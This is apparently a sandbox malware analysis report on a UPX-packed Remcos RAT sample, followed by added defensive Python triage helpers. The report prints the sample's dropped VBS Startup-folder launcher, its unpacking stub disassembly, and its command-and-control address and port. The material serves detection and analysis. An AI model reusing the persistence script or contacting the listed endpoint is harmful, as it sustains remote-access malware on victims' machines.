                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
                  Decoded preview (the file is UTF-16LE without BOM; the dots above are NUL and line-terminator bytes; 135 characters x 2 bytes = the 270-byte size listed):
                  Set WshShell = CreateObject("WScript.Shell")
                  WshShell.Run "C:\Users\alfons\AppData\Local\directory\name.exe", 1
                  Set WshShell = Nothing
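The 270-byte file above is the Startup-folder launcher behind the report's "Drops VBS files to the startup folder" signature. Its preview is UTF-16LE text with NUL bytes rendered as dots, and it hardcodes an absolute path under the user profile (the script contains the profile name alfons while the rest of the report shows the anonymised user). The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it decodes such a dropped script, extracts the WshShell.Run target and flags targets that live in user-writable trees. SAMPLE_VBS is constructed here to match the preview byte for byte (no BOM, single-character line terminators), and SUSPICIOUS_DIRS is an assumption about which directories warrant a closer look.

```python
"""Decode a dropped Startup-folder VBS and extract what it launches.

Added triage helper, not part of the report or the sample. SAMPLE_VBS is constructed to
match the report's preview; SUSPICIOUS_DIRS is an assumption about where user-writable
payloads are staged.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed to match the preview: three lines, LF-separated, UTF-16LE, no BOM (270 bytes).
SAMPLE_VBS = (
    'Set WshShell = CreateObject("WScript.Shell")\n'
    'WshShell.Run "C:\\Users\\alfons\\AppData\\Local\\directory\\name.exe", 1\n'
    'Set WshShell = Nothing\n'
).encode("utf-16-le")

# WshShell.Run "<command>"[, <window style>[, <wait>]]
RUN_RE = re.compile(r'\.Run\s+"([^"]+)"(?:\s*,\s*(\d+))?', re.IGNORECASE)

# Assumption: a Startup launcher pointing into one of these trees is worth flagging.
SUSPICIOUS_DIRS = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


@dataclass
class RunTarget:
    path: str
    window_style: Optional[int]  # 1 = SW_SHOWNORMAL, 0 = hidden window
    suspicious: bool


def decode_script(raw: bytes) -> str:
    """Decode a dropped script: UTF-16LE with or without BOM, otherwise 8-bit text."""
    if raw.startswith(b"\xff\xfe"):
        return raw[2:].decode("utf-16-le")
    # No BOM: UTF-16LE ASCII text has a NUL in every odd byte position.
    odd_bytes = raw[1:64:2]
    if odd_bytes and all(b == 0 for b in odd_bytes):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")


def extract_run_targets(script: str) -> List[RunTarget]:
    """Every WshShell.Run target in the script, flagged when it lives in a user-writable tree."""
    targets = []
    for m in RUN_RE.finditer(script):
        path = m.group(1)
        style = int(m.group(2)) if m.group(2) else None
        lowered = path.lower()
        targets.append(RunTarget(path, style, any(d in lowered for d in SUSPICIOUS_DIRS)))
    return targets


def triage(raw: bytes) -> List[RunTarget]:
    """Decode and extract in one call, as a scanner over the Startup folder would use it."""
    return extract_run_targets(decode_script(raw))


if __name__ == "__main__":
    for t in triage(SAMPLE_VBS):
        verdict = "SUSPICIOUS" if t.suspicious else "ok"
        print(f"{verdict}: {t.path} (window style {t.window_style})")
```

Because the script stores the absolute profile path, the same persistence entry copied to another account or machine would fail to start the payload; a scanner should therefore report the literal path rather than normalising it.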
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.422217525488068
                  Encrypted:false
                  SSDEEP:6144:qSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNA0uhiTw:ZvloTyW+EZMM6DFyi03w
                  MD5:6D7CE8FBEAC1B888D888F048C600DC5D
                  SHA1:66E56F156A2559F2F892759CEB5DC148382ADC69
                  SHA-256:7E992D367C1D79D96182878744E97B956374EA9BA8C2FFC1E35DCF52536B32B0
                  SHA-512:4C294A1A1BCAEF20144E8CDEF28CF49CA2D445DA536551C6D3E494BEC3BA4AC797B5E21AA81773E2BDC4400B0C2C77809903C943FA3B625035319D267CCAA5E3
                  Malicious:false
                  Preview:regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                  Entropy (8bit):7.981854223673753
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.39%
                  • UPX compressed Win32 Executable (30571/9) 0.30%
                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  File name:jv4ri.exe
                  File size:826'368 bytes
                  MD5:b17e1003bb9bbe58e090c7752447c016
                  SHA1:a159b486e535469d4c49b227d27608f2ad48288e
                  SHA256:d24d76d03365122aa5a4a7828a2d14368066da840ae8945cf595a6b17ceca700
                  SHA512:05077e35558e1bb636596d7a8c6b66f9554ecf8e057f61c3cf7f4af91c19f898943a5dc8b1f13914b231e09671a36631e2490e0b32799250537a375dad83af3a
                  SSDEEP:24576:4BXu9HGaVHUVeaBzcvMgTvk+39ABn8ApTZl:4w9VHUVebvjT19ABfp
                  TLSH:3A0523D23EEA671BD4E042BADC53A530781B40E583F73B8D944FDAD2B96BBC0A851074
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                  Icon Hash:0f0dcc9a8acc490f
                  Entrypoint:0x54c0b0
                  Entrypoint Section:UPX1
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66DA42F5 [Thu Sep 5 23:47:01 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:fc6683d30d9f25244a50fd5357825e79
                  Instruction
                  pushad
                  mov esi, 004F6000h
                  lea edi, dword ptr [esi-000F5000h]
                  push edi
                  jmp 00007F9FD47BE70Dh
                  nop
                  mov al, byte ptr [esi]
                  inc esi
                  mov byte ptr [edi], al
                  inc edi
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE6EFh
                  mov eax, 00000001h
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  add ebx, ebx
                  jnc 00007F9FD47BE70Dh
                  jne 00007F9FD47BE72Ah
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE721h
                  dec eax
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc eax, eax
                  jmp 00007F9FD47BE6D6h
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  jmp 00007F9FD47BE754h
                  xor ecx, ecx
                  sub eax, 03h
                  jc 00007F9FD47BE713h
                  shl eax, 08h
                  mov al, byte ptr [esi]
                  inc esi
                  xor eax, FFFFFFFFh
                  je 00007F9FD47BE777h
                  sar eax, 1
                  mov ebp, eax
                  jmp 00007F9FD47BE70Dh
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE6CEh
                  inc ecx
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jc 00007F9FD47BE6C0h
                  add ebx, ebx
                  jne 00007F9FD47BE709h
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  adc ecx, ecx
                  add ebx, ebx
                  jnc 00007F9FD47BE6F1h
                  jne 00007F9FD47BE70Bh
                  mov ebx, dword ptr [esi]
                  sub esi, FFFFFFFCh
                  adc ebx, ebx
                  jnc 00007F9FD47BE6E6h
                  add ecx, 02h
                  cmp ebp, FFFFFB00h
                  adc ecx, 02h
                  lea edx, dword ptr [edi+ebp]
                  cmp ebp, FFFFFFFCh
                  jbe 00007F9FD47BE710h
                  mov al, byte ptr [edx]
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
                  Name | Virtual Address | Virtual Size | Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1bff50 | 0x424 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14d000 | 0x72f50 | .rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1c0374 | 0xc | .rsrc
                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x14c294 | 0x48 | UPX1
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                  UPX0 | 0x1000 | 0xf5000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  UPX1 | 0xf6000 | 0x57000 | 0x56400 | 5fcb5e9dc3fafe6169a6239ed7042f67 | False | 0.9873188405797102 | data | 7.935611316659627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc | 0x14d000 | 0x74000 | 0x73400 | 9e6c7904014ead3ac19cf87555242024 | False | 0.9930708547993492 | data | 7.993884705816442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
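The section table shows the usual UPX layout: UPX0 is executable but has no raw data (it is the region the stub decompresses into), the entrypoint 0x54c0b0 (RVA 0x14c0b0 against the 0x400000 image base) lies in UPX1 whose raw bytes have an entropy of 7.94, and every section is writable. The Python below is an added example, not the report's or the sample's code: it parses a PE section table with only the standard library, recomputes the 8-bit entropy column, and emits the packer indicators a triage script would raise. A minimal PE32 image with this report's section RVAs and sizes is constructed in memory so the code runs offline; the section bodies are shrunk to 4 KiB of deterministic pseudo-random bytes, and the 7.0 entropy threshold is an assumption.

```python
"""Packer indicators from a PE section table (added example, not the report's or sample's code).

build_sample_pe() constructs a minimal PE32 image with the RVAs from this report; section
bodies are 4 KiB of deterministic pseudo-random data standing in for compressed code
(assumption: real samples are read from disk with open(path, "rb").read()).
"""
import math
import random
import struct
from collections import Counter, namedtuple

IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

Section = namedtuple("Section", "name va vsize raw_ptr raw_size characteristics entropy")


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the report's 'Entropy (8bit)' column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> tuple:
    """Return (AddressOfEntryPoint RVA, [Section]) from a PE32/PE32+ image held in memory."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt_off = e_lfanew + 24                      # optional header follows the 20-byte file header
    entry_rva = struct.unpack_from("<I", pe, opt_off + 16)[0]
    sections = []
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, opt_off + opt_size + 40 * i)
        body = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append(Section(name.rstrip(b"\0").decode("ascii", "replace"),
                                va, vsize, raw_ptr, raw_size, chars, shannon_entropy(body)))
    return entry_rva, sections


def packer_indicators(pe: bytes, entropy_threshold: float = 7.0) -> list:
    """Findings a triage script would raise; an empty list means nothing fired."""
    entry_rva, sections = parse_sections(pe)
    findings = []
    if any(s.name.startswith("UPX") for s in sections):
        findings.append("UPX section names")
    for s in sections:
        executable = bool(s.characteristics & IMAGE_SCN_MEM_EXECUTE)
        writable = bool(s.characteristics & IMAGE_SCN_MEM_WRITE)
        holds_entry = s.va <= entry_rva < s.va + max(s.vsize, s.raw_size)
        if executable and s.raw_size == 0 and s.vsize > 0:
            findings.append(f"{s.name}: executable with no raw data (unpack target)")
        if holds_entry and s.entropy > entropy_threshold:
            findings.append(f"{s.name}: entrypoint in high-entropy section ({s.entropy:.2f})")
        if executable and writable:
            findings.append(f"{s.name}: writable and executable")
    return findings


def build_sample_pe() -> bytes:
    """Constructed PE32 with jv4ri.exe's section layout (RVAs from the report, bodies 4 KiB)."""
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    layout = [  # name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics
        (b"UPX0", 0x1000, 0xF5000, 0, IMAGE_SCN_CNT_UNINITIALIZED_DATA | rwx),
        (b"UPX1", 0xF6000, 0x57000, 0x1000, IMAGE_SCN_CNT_INITIALIZED_DATA | rwx),
        (b".rsrc", 0x14D000, 0x74000, 0x1000,
         IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    hdr_end = 0x200                                   # 432 header bytes padded to file alignment
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(layout), 0x66DA42F5, 0, 0, 224, 0x0102)
    # PE32 optional header: Magic 0x10b ... AddressOfEntryPoint = 0x54c0b0 - ImageBase 0x400000
    opt = struct.pack("<HBBIIII", 0x10B, 0, 0, 0, 0, 0, 0x14C0B0) + b"\0" * (224 - 20)
    rng, sec_hdrs, bodies, raw_ptr = random.Random(1), b"", b"", hdr_end
    for name, va, vsize, raw_size, chars in layout:
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size,
                                raw_ptr if raw_size else 0, 0, 0, 0, 0, chars)
        bodies += rng.randbytes(raw_size)
        raw_ptr += raw_size
    header = dos + b"PE\0\0" + file_hdr + opt + sec_hdrs
    return header + b"\0" * (hdr_end - len(header)) + bodies


if __name__ == "__main__":
    for finding in packer_indicators(build_sample_pe()):
        print(finding)
```

The entropy check alone is a weak signal (any compressed resource scores near 8.0); the combination with an executable zero-raw-size section and an entrypoint outside the first section is what distinguishes a packer stub from a merely compressed data section.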
                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                  RT_ICON | 0x14d45c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                  RT_ICON | 0x14d588 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                  RT_ICON | 0x14d6b4 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                  RT_ICON | 0x14d7e0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.26011560693641617
                  RT_MENU | 0xc8d38 | 0x50 | empty | English | Great Britain | 0
                  RT_STRING | 0xc8d88 | 0x594 | empty | English | Great Britain | 0
                  RT_STRING | 0xc931c | 0x68a | empty | English | Great Britain | 0
                  RT_STRING | 0xc99a8 | 0x490 | empty | English | Great Britain | 0
                  RT_STRING | 0xc9e38 | 0x5fc | empty | English | Great Britain | 0
                  RT_STRING | 0xca434 | 0x65c | empty | English | Great Britain | 0
                  RT_STRING | 0xcaa90 | 0x466 | empty | English | Great Britain | 0
                  RT_STRING | 0xcaef8 | 0x158 | empty | English | Great Britain | 0
                  RT_RCDATA | 0x14dd4c | 0x71cd0 | data | | | 1.0003239453540658
                  RT_GROUP_ICON | 0x1bfa20 | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x1bfa38 | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x1bfa50 | 0x14 | data | English | Great Britain | 1.15
                  RT_GROUP_ICON | 0x1bfa68 | 0x14 | data | English | Great Britain | 1.25
                  RT_VERSION | 0x1bfa80 | 0xdc | data | English | Great Britain | 0.6181818181818182
                  RT_MANIFEST | 0x1bfb60 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                  DLL | Import
                  KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                  ADVAPI32.dll | GetAce
                  COMCTL32.dll | ImageList_Remove
                  COMDLG32.dll | GetOpenFileNameW
                  GDI32.dll | LineTo
                  IPHLPAPI.DLL | IcmpSendEcho
                  MPR.dll | WNetUseConnectionW
                  ole32.dll | CoGetObject
                  OLEAUT32.dll | VariantInit
                  PSAPI.DLL | GetProcessMemoryInfo
                  SHELL32.dll | DragFinish
                  USER32.dll | GetDC
                  USERENV.dll | LoadUserProfileW
                  UxTheme.dll | IsThemeActive
                  VERSION.dll | VerQueryValueW
                  WININET.dll | FtpOpenFileW
                  WINMM.dll | timeGetTime
                  WSOCK32.dll | connect
                  Language of compilation system | Country where language is spoken | Map
                  English | Great Britain |
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2024-09-06T21:56:59.201852+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49704 | 45.95.169.104 | 2404 | TCP
                  2024-09-06T21:57:23.529980+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49721 | 45.95.169.104 | 2404 | TCP
                  2024-09-06T21:57:23.529980+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49722 | 45.95.169.104 | 2404 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 6, 2024 21:56:58.460700989 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:56:58.465568066 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:56:58.465643883 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:56:58.477237940 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:56:58.482157946 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:56:59.157486916 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:56:59.201852083 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:56:59.311888933 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:56:59.316292048 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:56:59.321089029 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:56:59.321161985 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:56:59.326046944 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:00.001950026 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:00.003623962 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:00.008390903 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:00.155252934 CEST | 2404 | 49704 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:00.201827049 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:22.795455933 CEST | 49721 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:22.798368931 CEST | 49722 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:22.800288916 CEST | 2404 | 49721 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:22.800352097 CEST | 49721 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:22.803178072 CEST | 2404 | 49722 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:22.803235054 CEST | 49722 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:22.804219961 CEST | 49721 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:22.807635069 CEST | 49722 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:22.809112072 CEST | 2404 | 49721 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:22.812450886 CEST | 2404 | 49722 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:23.474173069 CEST | 2404 | 49722 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:23.477284908 CEST | 2404 | 49721 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:23.529979944 CEST | 49721 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:23.529979944 CEST | 49722 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:23.620095015 CEST | 2404 | 49722 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:23.622539997 CEST | 2404 | 49721 | 45.95.169.104 | 192.168.2.5
                  Sep 6, 2024 21:57:23.670605898 CEST | 49722 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:23.670624018 CEST | 49721 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:27.905349016 CEST | 49704 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:27.905464888 CEST | 49721 | 2404 | 192.168.2.5 | 45.95.169.104
                  Sep 6, 2024 21:57:27.905503035 CEST | 49722 | 2404 | 192.168.2.5 | 45.95.169.104

                  Target ID:0
                  Start time:15:56:52
                  Start date:06/09/2024
                  Path:C:\Users\user\Desktop\jv4ri.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\jv4ri.exe"
                  Imagebase:0xc70000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:15:56:54
                  Start date:06/09/2024
                  Path:C:\Users\user\AppData\Local\directory\name.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\jv4ri.exe"
                  Imagebase:0x20000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 42%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:3
                  Start time:15:56:55
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\jv4ri.exe"
                  Imagebase:0x170000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:15:56:55
                  Start date:06/09/2024
                  Path:C:\Users\user\AppData\Local\directory\name.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x20000
                  File size:826'368 bytes
                  MD5 hash:B17E1003BB9BBE58E090C7752447C016
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:true

                  Target ID:5
                  Start time:15:56:57
                  Start date:06/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                  Imagebase:0x170000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
